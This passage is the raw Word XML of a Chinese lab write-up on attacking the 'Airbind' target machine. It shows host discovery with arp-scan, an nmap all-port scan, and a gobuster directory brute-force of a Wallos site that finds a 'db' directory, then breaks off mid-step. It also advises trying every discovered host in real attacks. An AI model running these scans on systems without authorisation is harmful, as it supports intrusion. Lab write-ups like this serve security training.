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99AB8" w14:textId="78292FEB" w:rsidR="00AD4BDD" w:rsidRPr="00D261D7" w:rsidRDefault="002703BA" w:rsidP="00C8379B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A</w:t>
      </w:r>
      <w:r w:rsidR="00130A1D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irbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094090D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攻击流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDF13B" w14:textId="25E65792" w:rsidR="00C710CD" w:rsidRPr="00D261D7" w:rsidRDefault="00C36967" w:rsidP="001B0FF8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信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42C9D6" w14:textId="287D560A" w:rsidR="00C36967" w:rsidRPr="00D261D7" w:rsidRDefault="00882680" w:rsidP="00C36967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主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753A2C6" w14:textId="2E48CE63" w:rsidR="002703BA" w:rsidRDefault="004301E7" w:rsidP="004834A7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利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ar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-scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidR="00DF3D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>内</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>主机进行探测，</w:t>
      </w:r>
      <w:r w:rsidR="00DF3D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>除</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00130A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>外均是该网络</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="003B2CC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的已知服务器</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，因此</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00130A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>airbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机。</w:t>
      </w:r>
      <w:r w:rsidR="004769BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidR="004769BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表扫描本地网络</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>指定扫描的网卡。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9C672" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00130A1D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3B791730" wp14:editId="2FBD7262">
            <wp:extent cx="5274310" cy="1978660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1125121459" name="图片 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21459" name="图片 1" descr="电脑萤幕画面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5772" w14:textId="058505F8" w:rsidR="00130A1D" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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D626F49" w14:textId="559BE1C9" w:rsidR="005A3A6C" w:rsidRPr="00CB547E" w:rsidRDefault="004F0474" w:rsidP="004834A7">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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注：为什么直接锁定到了靶机？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939A6A5" w14:textId="33FB120A" w:rsidR="004F0474" w:rsidRPr="00CB547E" w:rsidRDefault="004F0474" w:rsidP="004834A7">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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解释：这里我们</w:t>
      </w:r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已知</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130A1D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airbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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是有漏洞的需要进行攻击</w:t>
      </w:r>
      <w:r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，</w:t>
      </w:r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因此实际上</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-scan</w:t>
      </w:r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在此只</w:t>
      </w:r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起到了查找</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130A1D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airbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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网络</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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的作用。在实际攻击场景中，我们并不清除哪个</w:t>
      </w:r>
      <w:r w:rsidR="007D135D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主机有漏洞，因此每个</w:t>
      </w:r>
      <w:r w:rsidR="00133DAF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探测到的</w:t>
      </w:r>
      <w:r w:rsidR="007D135D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主机都要尝试攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEC6F3" w14:textId="31809997" w:rsidR="0080068B" w:rsidRPr="00D261D7" w:rsidRDefault="00C96A95" w:rsidP="0080068B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0" w:name="_Ref172016564"/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端口扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0303F7E2" w14:textId="08A9A032" w:rsidR="0080068B" w:rsidRDefault="00BC1A65" w:rsidP="00357BD0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利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nma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对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>airbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00130A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行端口扫描</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描模式，</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以查看端口上的服务的版本信息</w:t>
      </w:r>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E4547E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表禁</w:t>
      </w:r>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-p-</w:t>
      </w:r>
      <w:r w:rsidR="00CD593C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表扫描所有端口</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00950F3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现开放着</w:t>
      </w:r>
      <w:r w:rsidR="008E7702">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00950F3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00357BD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00357BD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00357BD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口可能是被防火墙过滤了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A444ECB" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00357BD0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B61DA57" wp14:editId="30257332">
            <wp:extent cx="5274310" cy="1402715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="167071275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12751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4C3E" w14:textId="29B90725" w:rsidR="00357BD0" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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4962F5B" w14:textId="405A7A1E" w:rsidR="00950F3E" w:rsidRPr="00950F3E" w:rsidRDefault="00950F3E" w:rsidP="00950F3E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W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eb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路径扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F52B22" w14:textId="3A53E425" w:rsidR="0038424D" w:rsidRDefault="00950F3E" w:rsidP="0038424D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访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.6.1</w:t>
      </w:r>
      <w:r w:rsidR="000C65CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现</w:t>
      </w:r>
      <w:r w:rsidR="00CA7DD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidR="00337216">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网站</w:t>
      </w:r>
      <w:r w:rsidR="00CA7DD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C65CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wallos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，先爆破一下当前位置的路径。</w:t>
      </w:r>
      <w:r w:rsidR="0038424D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令行输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9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="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u '192.168.6.150' -w '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/wordlists/directory-list-2.3-medium.txt' -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F2EA9" w:rsidRPr="005F2EA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jpg,txt,png,zip,php,bak,html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA7689">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，得到爆破到的</w:t>
      </w:r>
      <w:r w:rsidR="00DF1436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidR="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006F26C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F26C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F26C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录，该目录一般用于存储数据库信息</w:t>
      </w:r>
      <w:r w:rsidR="00B37D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C50357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在浏览器中按</w:t>
      </w:r>
      <w:r w:rsidR="00C50357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f12</w:t>
      </w:r>
      <w:r w:rsidR="00C50357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
